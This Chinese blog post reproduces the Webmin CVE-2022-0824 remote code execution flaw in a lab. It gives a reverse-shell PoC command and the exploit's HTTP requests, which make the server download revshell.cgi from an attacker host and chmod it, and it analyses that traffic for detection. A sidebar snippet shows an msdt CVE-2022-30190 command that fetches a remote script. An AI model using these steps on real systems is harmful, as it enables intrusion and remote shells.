CVE-2022-0824 Webmin 远程代码执行漏洞复现

已于 2022-10-11 19:20:22 修改
阅读量2.7k 收藏 6
点赞数 2
分类专栏: 漏洞复现【Free】 文章标签: 网络安全 web安全 安全威胁分析
于 2022-10-11 19:17:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/127269556
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Vulfocus环境搭建:

漏洞环境搭建:

后台执行:

导入环境:

启动&访问:

​编辑Kali监听:​

0x06 漏洞复现:

POC:

下载地址:

执行POC:

0x07 流量分析:

特征一(强特征):

请求url:

Data参数:

服务端响应:

特征二(弱特征):

客户端请求url:

服务端响应:

特征三(强特征):

客户端请求url:

Data参数

服务端响应:

Message数据:

特征四(强特征):

客户端请求url:

Data参数

服务端响应:

Message数据:

特征五(关联特征):

客户端请求url:

Referer:

服务端响应:

特征六:

0x08 修复建议:

0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。

Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。

0x03 漏洞概述:

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。

0x04 影响版本:

Webmin < Webmin Webmin1.990

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:(Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客

漏洞环境搭建:

后台执行:

docker pull vulfocus/webmin_cve-2022-0824:latest

导入环境:

启动&访问:

 账号:root    密码:password

Kali监听: 

0x06 漏洞复现:

POC:

下载地址:

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

执行POC:

python3 Webmin-revshell.py -t http://192.168.119.155:18033 -c root:password -LS 192.168.119.215:9090 -L 192.168.119.215 -P 7777

0x07 流量分析:

特征一(强特征):

请求url:

POST  /session_login.cgi

Data参数:

user=root&pass=password

服务端响应:

HTTP/1.0 302 Moved Temporarily

特征二(弱特征):

客户端请求url:

GET /

服务端响应:

HTTP/1.0 200 Document follows

特征三(强特征):

客户端请求url:

POST /extensions/file-manager/http_download.cgi?module=filamin

Data参数

link=http%3A%2F%2F192.168.119.215%3A9090%2Frevshell.cgi&username=&password=&path=%2Fusr%2Fshare%2Fwebmin

服务端响应:

HTTP/1.0 200 Document follows

Message数据:

[{"error":"File with name `<strong><em>revshell.cgi</em></strong>` already exists in `<strong><tt>/usr/share/webmin</tt></strong>`."}]

特征四(强特征):

客户端请求url:

POST /extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30

Data参数

name=revshell.cgi&perms=0755&applyto=1&path=%2Fusr%2Fshare%2Fwebmin

服务端响应:

HTTP/1.0 302 Moved Temporarily

Message数据:

path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=&regex=&all_items=

特征五(关联特征):

关联特征四中服务器Message数据的路径

客户端请求url:

GET /extensions/file-manager/list.cgi?path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=&regex=&all_items=

Referer:

http://192.168.119.155:18033/filemin/?xnavigation=1

服务端响应:

HTTP/1.0 200 Document follows

特征六:

就是反弹shell的内容了

0x08 修复建议:

更新到最新版本 附带厂商补丁链接:

https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38

Kang_Sec
关注
专栏目录
CVE-2022-36446 Webmin命令注入漏洞复现
热爱学习,喜欢折腾!
08-15 3739
Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。近日,Webmin被披露存在一个任意命令注入漏洞CVE-2022-36446),其CVSS评分为9.8,目前该漏洞的PoC/EXP已公开。Webmin版本1.997之前,由于缺乏输入清理,导致可以注入将连接到包管理器调用的任意命令。经过身份验证且有权访问软件包更新模块的用户可以通过在新软件包安装期间执行 OS 命令注入实现在系统上以 root 权限运行命令。........
CVE-2019-15107 Webmin远程命令执行漏洞复现
墨痕诉清风的博客
11-05 636
在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。根据最新消息,该应用在官方提供的sourceforge下载的源码才包含这个漏洞,而官方Github上的代码安全的。在sourceforge上下载,链接如下。这里的user值要是用的是一个假的用户,使用真实的root测试不成功,只有在发送的用户参数的值不是已知的Linux用户的情况下(而参考链接中是user=root123),展示进入才会到修改/etc/shadow的地方,触发命令注入漏洞。查看response。.
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2042
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
Webmin 远程代码执行CVE-2022-0824漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3320
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
漏洞复现】某凌OA 文件Copy导致远程代码执行
最新发布
weixin_54799594的博客
07-25 2663
漏洞复现笔记
Webmin 远程代码执行Getshell漏洞复现 编号:CVE-2022-0824
08-31 2061
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。......
CVE-2022-0824 Webmin 远程代码执行
weixin_45501486的博客
03-22 193
0x00 简介Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地集合对象一样轻松地操作分布式数据集。spark除了能够提供交互式查询外,它还可以优化迭代工作负载。0x01 漏洞概述该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable...
CVE-2022-36446 Webmin命令注入漏洞
weixin_45705830的博客
03-02 448
CVE-2022-36446是一个Webmin的任意命令注入漏洞,影响了1.997版本之前的Webmin。该漏洞存在于software/apt-lib.pl文件中,由于缺乏对用户输入的HTML转义,导致可以注入将连接到包管理器调用的任意命令。该漏洞可以被远程未经身份验证的攻击者利用,执行任意代码或获取系统权限。
Webmin 远程命令执行漏洞CVE-2019-15107)漏洞复现
s1056481432的博客
08-19 1136
漏洞介绍 Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可 以执行任意系统命令。 漏洞环境 在vulhub执行如下命令,启动webmin 1.910: docker-compose up -d 执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。 漏洞复现 参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况
Webmin 远程命令执行漏洞CVE-2019-15107)
EC_Carrot的博客
08-21 428
漏洞简介 Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。 漏洞复现 发送如下数据包,即可执行命令id: POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate
webmin 远程命令执行CVE-2019-15107)漏洞复现
weixin_42675091的博客
09-06 479
webmin 远程命令执行CVE-2019-15107)漏洞复现
Webmin远程命令执行漏洞(CVE-2019-15107)复现
qq_24481913的博客
08-01 300
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
Vulfocus练习之Webmin远程代码执行(CVE-2022-0824
weixin_45701865的博客
12-13 902
Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。在 1.990 之前的 GitHub 存储库 webmin/webmin 中对远程代码执行的访问控制不当。
Webmin 远程命令执行漏洞CVE-2019-15107)复现
weixin_44522540的博客
05-03 758
一、环境搭建 本次采用vulhub进行复现 二、复现过程 POST /password_change.cgi HTTP/1.1 Host: 192.168.252.145:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif
漏洞复现Webmin 远程命令执行漏洞(CVE-2019-15107)
weixin_43486390的博客
01-20 832
0x01 概述 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞威胁,而在其它版本当用户开启密码过期策略时,受该漏洞威胁漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行。 0x02 影响版本 webmin=1.882-1.920 条件:除1.890版本,其余受影响的版本的服务器的配置文件允
漏洞复现------Webmin 远程命令执行漏洞CVE-2019-15107)
Z_Grant的博客
09-23 8089
文章目录一,webmin简介二,漏洞概述三,漏洞复现(1)环境搭建(2)exp四,漏洞分析五,漏洞修复 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值